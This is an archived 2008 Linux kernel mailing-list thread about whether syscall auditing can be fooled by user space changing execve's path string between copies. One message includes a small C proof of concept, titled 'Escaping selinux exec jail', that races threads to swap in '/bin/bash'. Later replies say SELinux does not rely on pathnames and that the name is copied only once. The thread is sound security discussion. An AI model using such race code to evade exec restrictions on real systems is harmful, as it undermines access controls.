* System call audit @ 2008-05-13 0:06 Mathieu Desnoyers 2008-05-13 9:24 ` David Woodhouse 0 siblings, 1 reply; 8+ messages in thread From: Mathieu Desnoyers @ 2008-05-13 0:06 UTC (permalink / raw) To: David Woodhouse, linux-kernel; +Cc: mingo Hi David, As I am looking into the system-wide system call tracing problem, I start to wonder how auditsc deals with the fact that user-space could concurrently change the content referred to by the __user pointers. This would be the case for execve. If we create a program with two thread; one is executing execve syscalls and the other thread would be modifying the userspace string containing the name of the program to execute. Since we have two copy_from_user, one in auditsc and one in the real execve() function, the string passed to the OS could differ from the string seen by auditsc. Regards, Mathieu -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 0:06 System call audit Mathieu Desnoyers @ 2008-05-13 9:24 ` David Woodhouse 2008-05-13 12:51 ` Mathieu Desnoyers 0 siblings, 1 reply; 8+ messages in thread From: David Woodhouse @ 2008-05-13 9:24 UTC (permalink / raw) To: Mathieu Desnoyers; +Cc: linux-kernel, mingo On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > Hi David, > > As I am looking into the system-wide system call tracing problem, I > start to wonder how auditsc deals with the fact that user-space could > concurrently change the content referred to by the __user pointers. In general we have to copy the content into kernel space, audit it, and then act on it from there. See the explanation on the IPC audit patch at http://lwn.net/Articles/125350/ for example. Auditing one thing and then acting on another would be simply broken. > This would be the case for execve. If we create a program with two > thread; one is executing execve syscalls and the other thread would be > modifying the userspace string containing the name of the program to > execute. I was going to suggest that that attack vector won't work, because execve() kills all threads. But all you have to do to avoid that is put the data in question into a shared writable mmap and modify it from another _process_. And in fact I suspect there's a combination of CLONE_ flags which would avoid the thread-killing behaviour anyway. > Since we have two copy_from_user, one in auditsc and one in the > real execve() function, the string passed to the OS could differ from > the string seen by auditsc. Right. Don't Do That Then. The audit code should see what's _actually_ given to the child process. The audit/execve code has changed since I last looked, but I think it's probably OK because it's reading the contents of the new program's mm on the way back from the execve() system call -- before ever giving the CPU back to that process. -- dwmw2 ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 9:24 ` David Woodhouse @ 2008-05-13 12:51 ` Mathieu Desnoyers 2008-05-13 12:59 ` David Woodhouse 2008-05-13 13:12 ` Stephen Smalley 0 siblings, 2 replies; 8+ messages in thread From: Mathieu Desnoyers @ 2008-05-13 12:51 UTC (permalink / raw) To: David Woodhouse; +Cc: linux-kernel, mingo * David Woodhouse (dwmw2@infradead.org) wrote: > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > > Hi David, > > > > As I am looking into the system-wide system call tracing problem, I > > start to wonder how auditsc deals with the fact that user-space could > > concurrently change the content referred to by the __user pointers. > > In general we have to copy the content into kernel space, audit it, and > then act on it from there. See the explanation on the IPC audit patch at > http://lwn.net/Articles/125350/ for example. > > Auditing one thing and then acting on another would be simply broken. > > > This would be the case for execve. If we create a program with two > > thread; one is executing execve syscalls and the other thread would be > > modifying the userspace string containing the name of the program to > > execute. > > I was going to suggest that that attack vector won't work, because > execve() kills all threads. But all you have to do to avoid that is put > the data in question into a shared writable mmap and modify it from > another _process_. And in fact I suspect there's a combination of CLONE_ > flags which would avoid the thread-killing behaviour anyway. > Even better : if execve fails, it doesn't kill the threads. Therefore, all we have to do is to busy-loop doing failing execve() calls and atomically change the string to what we want to be executed. Can anyone test the sample snippet in a context where executing /bin/bash is disallowed on a SMP system ? I don't have a selinux setup handy. I suppose that as soon as selinux would see one /bin/bash exec, it will kill the process, so a few runs would be required in order to generate the correct race. /* * Escaping selinux exec jail * * build with gcc -lpthread -o escape-selinux escape-selinux.c * * Mathieu Desnoyers * License: GPL */ #include <stdio.h> #include <pthread.h> #include <stdlib.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <stdio.h> #include <signal.h> static char modstring[] = "$bin/bash"; void *thr1(void *arg) { while(1) { execl(modstring, NULL); } return ((void*)1); } void *thr2(void *arg) { while(1) { modstring[0] = '$'; modstring[0] = '/'; } return ((void*)2); } int main() { int err; pthread_t tid1, tid2; void *tret; err = pthread_create(&tid1, NULL, thr1, NULL); if (err != 0) exit(1); err = pthread_create(&tid2, NULL, thr2, NULL); if (err != 0) exit(1); sleep(10); err = pthread_join(tid1, &tret); if (err != 0) exit(1); err = pthread_join(tid2, &tret); if (err != 0) exit(1); return 0; } > > Since we have two copy_from_user, one in auditsc and one in the > > real execve() function, the string passed to the OS could differ from > > the string seen by auditsc. > > Right. Don't Do That Then. The audit code should see what's _actually_ > given to the child process. The audit/execve code has changed since I > last looked, but I think it's probably OK because it's reading the > contents of the new program's mm on the way back from the execve() > system call -- before ever giving the CPU back to that process. > > -- > dwmw2 > -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 12:51 ` Mathieu Desnoyers @ 2008-05-13 12:59 ` David Woodhouse 2008-05-13 13:12 ` Mathieu Desnoyers 2008-05-13 13:51 ` Mathieu Desnoyers 2008-05-13 13:12 ` Stephen Smalley 1 sibling, 2 replies; 8+ messages in thread From: David Woodhouse @ 2008-05-13 12:59 UTC (permalink / raw) To: Mathieu Desnoyers; +Cc: linux-kernel, mingo On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote: > * David Woodhouse (dwmw2@infradead.org) wrote: > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > > > Hi David, > > > > > > As I am looking into the system-wide system call tracing problem, I > > > start to wonder how auditsc deals with the fact that user-space could > > > concurrently change the content referred to by the __user pointers. > > > > In general we have to copy the content into kernel space, audit it, and > > then act on it from there. See the explanation on the IPC audit patch at > > http://lwn.net/Articles/125350/ for example. > > > > Auditing one thing and then acting on another would be simply broken. > > > > > This would be the case for execve. If we create a program with two > > > thread; one is executing execve syscalls and the other thread would be > > > modifying the userspace string containing the name of the program to > > > execute. > > > > I was going to suggest that that attack vector won't work, because > > execve() kills all threads. But all you have to do to avoid that is put > > the data in question into a shared writable mmap and modify it from > > another _process_. And in fact I suspect there's a combination of CLONE_ > > flags which would avoid the thread-killing behaviour anyway. > > > > Even better : if execve fails, it doesn't kill the threads. Therefore, > all we have to do is to busy-loop doing failing execve() calls and > atomically change the string to what we want to be executed. Can anyone > test the sample snippet in a context where executing /bin/bash is > disallowed on a SMP system ? I don't have a selinux setup handy. You were talking about audit earlier. Now you seem to be talking about selinux. -- dwmw2 ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 12:59 ` David Woodhouse @ 2008-05-13 13:12 ` Mathieu Desnoyers 2008-05-13 13:19 ` Stephen Smalley 2008-05-13 13:51 ` Mathieu Desnoyers 1 sibling, 1 reply; 8+ messages in thread From: Mathieu Desnoyers @ 2008-05-13 13:12 UTC (permalink / raw) To: David Woodhouse; +Cc: linux-kernel, mingo * David Woodhouse (dwmw2@infradead.org) wrote: > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote: > > * David Woodhouse (dwmw2@infradead.org) wrote: > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > > > > Hi David, > > > > > > > > As I am looking into the system-wide system call tracing problem, I > > > > start to wonder how auditsc deals with the fact that user-space could > > > > concurrently change the content referred to by the __user pointers. > > > > > > In general we have to copy the content into kernel space, audit it, and > > > then act on it from there. See the explanation on the IPC audit patch at > > > http://lwn.net/Articles/125350/ for example. > > > > > > Auditing one thing and then acting on another would be simply broken. > > > > > > > This would be the case for execve. If we create a program with two > > > > thread; one is executing execve syscalls and the other thread would be > > > > modifying the userspace string containing the name of the program to > > > > execute. > > > > > > I was going to suggest that that attack vector won't work, because > > > execve() kills all threads. But all you have to do to avoid that is put > > > the data in question into a shared writable mmap and modify it from > > > another _process_. And in fact I suspect there's a combination of CLONE_ > > > flags which would avoid the thread-killing behaviour anyway. > > > > > > > Even better : if execve fails, it doesn't kill the threads. Therefore, > > all we have to do is to busy-loop doing failing execve() calls and > > atomically change the string to what we want to be executed. Can anyone > > test the sample snippet in a context where executing /bin/bash is > > disallowed on a SMP system ? I don't have a selinux setup handy. > > You were talking about audit earlier. Now you seem to be talking about > selinux. > I thought selinux did hook into syscall audit ? (sorry, I am new to the kernel auditing field) The race I refer to is in the auditsc.c kernel code, so syscall audit would be the one I am talking about. I refer to selinux here just because, as of my understanding, it happens to be one module-based callback which can hook on syscall audit. Mathieu -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 13:12 ` Mathieu Desnoyers @ 2008-05-13 13:19 ` Stephen Smalley 0 siblings, 0 replies; 8+ messages in thread From: Stephen Smalley @ 2008-05-13 13:19 UTC (permalink / raw) To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo On Tue, 2008-05-13 at 09:12 -0400, Mathieu Desnoyers wrote: > * David Woodhouse (dwmw2@infradead.org) wrote: > > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote: > > > * David Woodhouse (dwmw2@infradead.org) wrote: > > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > > > > > Hi David, > > > > > > > > > > As I am looking into the system-wide system call tracing problem, I > > > > > start to wonder how auditsc deals with the fact that user-space could > > > > > concurrently change the content referred to by the __user pointers. > > > > > > > > In general we have to copy the content into kernel space, audit it, and > > > > then act on it from there. See the explanation on the IPC audit patch at > > > > http://lwn.net/Articles/125350/ for example. > > > > > > > > Auditing one thing and then acting on another would be simply broken. > > > > > > > > > This would be the case for execve. If we create a program with two > > > > > thread; one is executing execve syscalls and the other thread would be > > > > > modifying the userspace string containing the name of the program to > > > > > execute. > > > > > > > > I was going to suggest that that attack vector won't work, because > > > > execve() kills all threads. But all you have to do to avoid that is put > > > > the data in question into a shared writable mmap and modify it from > > > > another _process_. And in fact I suspect there's a combination of CLONE_ > > > > flags which would avoid the thread-killing behaviour anyway. > > > > > > > > > > Even better : if execve fails, it doesn't kill the threads. Therefore, > > > all we have to do is to busy-loop doing failing execve() calls and > > > atomically change the string to what we want to be executed. Can anyone > > > test the sample snippet in a context where executing /bin/bash is > > > disallowed on a SMP system ? I don't have a selinux setup handy. > > > > You were talking about audit earlier. Now you seem to be talking about > > selinux. > > > > I thought selinux did hook into syscall audit ? (sorry, I am new to the > kernel auditing field) The race I refer to is in the auditsc.c kernel > code, so syscall audit would be the one I am talking about. I refer to > selinux here just because, as of my understanding, it happens to be one > module-based callback which can hook on syscall audit. SELinux is a user of the audit subsystem in terms of generating audit messages for permission denials. It doesn't rely on any inputs from the audit subsystem. -- Stephen Smalley National Security Agency ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 12:59 ` David Woodhouse 2008-05-13 13:12 ` Mathieu Desnoyers @ 2008-05-13 13:51 ` Mathieu Desnoyers 1 sibling, 0 replies; 8+ messages in thread From: Mathieu Desnoyers @ 2008-05-13 13:51 UTC (permalink / raw) To: David Woodhouse; +Cc: linux-kernel, mingo * David Woodhouse (dwmw2@infradead.org) wrote: > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote: > > * David Woodhouse (dwmw2@infradead.org) wrote: > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > > > > Hi David, > > > > > > > > As I am looking into the system-wide system call tracing problem, I > > > > start to wonder how auditsc deals with the fact that user-space could > > > > concurrently change the content referred to by the __user pointers. > > > > > > In general we have to copy the content into kernel space, audit it, and > > > then act on it from there. See the explanation on the IPC audit patch at > > > http://lwn.net/Articles/125350/ for example. > > > > > > Auditing one thing and then acting on another would be simply broken. > > > > > > > This would be the case for execve. If we create a program with two > > > > thread; one is executing execve syscalls and the other thread would be > > > > modifying the userspace string containing the name of the program to > > > > execute. > > > > > > I was going to suggest that that attack vector won't work, because > > > execve() kills all threads. But all you have to do to avoid that is put > > > the data in question into a shared writable mmap and modify it from > > > another _process_. And in fact I suspect there's a combination of CLONE_ > > > flags which would avoid the thread-killing behaviour anyway. > > > > > > > Even better : if execve fails, it doesn't kill the threads. Therefore, > > all we have to do is to busy-loop doing failing execve() calls and > > atomically change the string to what we want to be executed. Can anyone > > test the sample snippet in a context where executing /bin/bash is > > disallowed on a SMP system ? I don't have a selinux setup handy. > > You were talking about audit earlier. Now you seem to be talking about > selinux. > Actually, getname/putname seems to make sure the name is only copied once per audit context. So it should be ok. Mathieu -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 ^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: System call audit 2008-05-13 12:51 ` Mathieu Desnoyers 2008-05-13 12:59 ` David Woodhouse @ 2008-05-13 13:12 ` Stephen Smalley 1 sibling, 0 replies; 8+ messages in thread From: Stephen Smalley @ 2008-05-13 13:12 UTC (permalink / raw) To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote: > * David Woodhouse (dwmw2@infradead.org) wrote: > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote: > > > Hi David, > > > > > > As I am looking into the system-wide system call tracing problem, I > > > start to wonder how auditsc deals with the fact that user-space could > > > concurrently change the content referred to by the __user pointers. > > > > In general we have to copy the content into kernel space, audit it, and > > then act on it from there. See the explanation on the IPC audit patch at > > http://lwn.net/Articles/125350/ for example. > > > > Auditing one thing and then acting on another would be simply broken. > > > > > This would be the case for execve. If we create a program with two > > > thread; one is executing execve syscalls and the other thread would be > > > modifying the userspace string containing the name of the program to > > > execute. > > > > I was going to suggest that that attack vector won't work, because > > execve() kills all threads. But all you have to do to avoid that is put > > the data in question into a shared writable mmap and modify it from > > another _process_. And in fact I suspect there's a combination of CLONE_ > > flags which would avoid the thread-killing behaviour anyway. > > > > Even better : if execve fails, it doesn't kill the threads. Therefore, > all we have to do is to busy-loop doing failing execve() calls and > atomically change the string to what we want to be executed. Can anyone > test the sample snippet in a context where executing /bin/bash is > disallowed on a SMP system ? I don't have a selinux setup handy. I > suppose that as soon as selinux would see one /bin/bash exec, it will > kill the process, so a few runs would be required in order to generate > the correct race. SELinux doesn't base any of its decisions on pathname strings provided by the user (or pathnames at all, for that matter; SELinux is attribute/label-based). > > /* > * Escaping selinux exec jail > * > * build with gcc -lpthread -o escape-selinux escape-selinux.c > * > * Mathieu Desnoyers > * License: GPL > */ > > #include <stdio.h> > #include <pthread.h> > #include <stdlib.h> > #include <sys/types.h> > #include <sys/wait.h> > #include <unistd.h> > #include <stdio.h> > #include <signal.h> > > static char modstring[] = "$bin/bash"; > > void *thr1(void *arg) > { > while(1) { > execl(modstring, NULL); > } > return ((void*)1); > > } > > void *thr2(void *arg) > { > while(1) { > modstring[0] = '$'; > modstring[0] = '/'; > } > return ((void*)2); > } > > int main() > { > int err; > pthread_t tid1, tid2; > void *tret; > > err = pthread_create(&tid1, NULL, thr1, NULL); > if (err != 0) > exit(1); > > err = pthread_create(&tid2, NULL, thr2, NULL); > if (err != 0) > exit(1); > > sleep(10); > > err = pthread_join(tid1, &tret); > if (err != 0) > exit(1); > > err = pthread_join(tid2, &tret); > if (err != 0) > exit(1); > > return 0; > } > > > > > Since we have two copy_from_user, one in auditsc and one in the > > > real execve() function, the string passed to the OS could differ from > > > the string seen by auditsc. > > > > Right. Don't Do That Then. The audit code should see what's _actually_ > > given to the child process. The audit/execve code has changed since I > > last looked, but I think it's probably OK because it's reading the > > contents of the new program's mm on the way back from the execve() > > system call -- before ever giving the CPU back to that process. > > > > -- > > dwmw2 > > > -- Stephen Smalley National Security Agency ^ permalink raw reply [flat|nested] 8+ messages in thread
end of thread, other threads:[~2008-05-13 13:51 UTC | newest] Thread overview: 8+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2008-05-13 0:06 System call audit Mathieu Desnoyers 2008-05-13 9:24 ` David Woodhouse 2008-05-13 12:51 ` Mathieu Desnoyers 2008-05-13 12:59 ` David Woodhouse 2008-05-13 13:12 ` Mathieu Desnoyers 2008-05-13 13:19 ` Stephen Smalley 2008-05-13 13:51 ` Mathieu Desnoyers 2008-05-13 13:12 ` Stephen Smalley
This is an external index of several public inboxes, see mirroring instructions on how to clone and mirror all data and code used by this external index.